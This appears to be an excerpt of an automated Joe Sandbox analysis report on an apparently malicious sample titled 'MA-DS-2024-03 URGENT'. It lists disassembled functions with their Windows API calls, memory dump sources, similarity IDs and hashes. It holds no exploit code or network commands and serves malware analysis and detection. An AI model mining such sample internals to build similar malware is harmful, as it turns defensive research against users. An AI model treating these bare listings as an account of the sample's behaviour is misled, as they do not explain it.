                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID:
                                                        • API String ID: 4210589936-0
                                                        • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                        • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                                                        • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                        • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                                                        Function 004563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                                                        • TranslateMessage.USER32(?), ref: 0045645C
                                                        • DispatchMessageW.USER32(?), ref: 00456466
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                        • String ID:
                                                        • API String ID: 2108273632-0
                                                        • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                        • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                                                        • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                        • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                                                        Function 00458A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00458A30
                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
                                                        • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                        • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                                                        • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                        • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                                                        Function 0045B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 0045B204
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                                                        • _wcsstr.LIBCMT ref: 0045B289
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                        • String ID:
                                                        • API String ID: 3902887630-0
                                                        • Opcode ID: d87f298fa4dae38cd6f0312fc2614bf8a2a084d96132e83ee32c0d3e76b571e2
                                                        • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                                                        • Opcode Fuzzy Hash: d87f298fa4dae38cd6f0312fc2614bf8a2a084d96132e83ee32c0d3e76b571e2
                                                        • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                                                        Function 0048B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                                                        • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$MetricsSystem
                                                        • String ID:
                                                        • API String ID: 2294984445-0
                                                        • Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                        • Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
                                                        • Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                        • Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
                                                        Function 00459307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
                                                        • __itow.LIBCMT ref: 0045936A
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
                                                        • __itow.LIBCMT ref: 004593A3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow$_memmove
                                                        • String ID:
                                                        • API String ID: 2983881199-0
                                                        • Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                        • Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
                                                        • Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                        • Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
                                                        Function 004012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                                        • SelectObject.GDI32(?,00000000), ref: 0040135C
                                                        • BeginPath.GDI32(?), ref: 00401373
                                                        • SelectObject.GDI32(?,00000000), ref: 0040139C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                        • Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
                                                        • Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                        • Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
                                                        Function 00464A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                                                        • __beginthreadex.LIBCMT ref: 00464AD8
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                        • String ID:
                                                        • API String ID: 3824534824-0
                                                        • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                        • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                                                        • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                        • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                                                        Function 016B18DF Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(00000008,?,?,016B15D8,016B3CBB,?,016B1D2A,?,?,00000000), ref: 016B18E4
                                                        • _free.LIBCMT ref: 016B1919
                                                        • _free.LIBCMT ref: 016B1940
                                                        • SetLastError.KERNEL32(00000000,?,016B1D2A,?,?,00000000), ref: 016B194D
                                                        • SetLastError.KERNEL32(00000000,?,016B1D2A,?,?,00000000), ref: 016B1956
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free
                                                        • String ID:
                                                        • API String ID: 3170660625-0
                                                        • Opcode ID: 4a541e87c464ef2b53855308e4ec21ba13c6175b16d801ce8492d104c936ebef
                                                        • Instruction ID: 3304e3a102767aebf341ceea58f8defbfa6128de3aa7613ed8c7958b3284e2fa
                                                        • Opcode Fuzzy Hash: 4a541e87c464ef2b53855308e4ec21ba13c6175b16d801ce8492d104c936ebef
                                                        • Instruction Fuzzy Hash: D401D6361006427B932276787CE8AFB169F9BC7575721012DF615A3242FB7284D28354
                                                        Function 00458202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                                                        • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                                                        • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 842720411-0
                                                        • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                        • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                                                        • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                        • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                                                        Function 0045710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                        • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                                                        • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                        • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                                                        Function 00465244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                        • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                                                        • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                        • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                                                        Function 0045810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                        • Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
                                                        • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                        • Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
                                                        Function 0045C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                                                        • MessageBeep.USER32(00000000), ref: 0045C226
                                                        • KillTimer.USER32(?,0000040A), ref: 0045C242
                                                        • EndDialog.USER32(?,00000001), ref: 0045C25C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                        • Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
                                                        • Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                        • Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
                                                        Function 016B3171 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                        Download Yara Rule
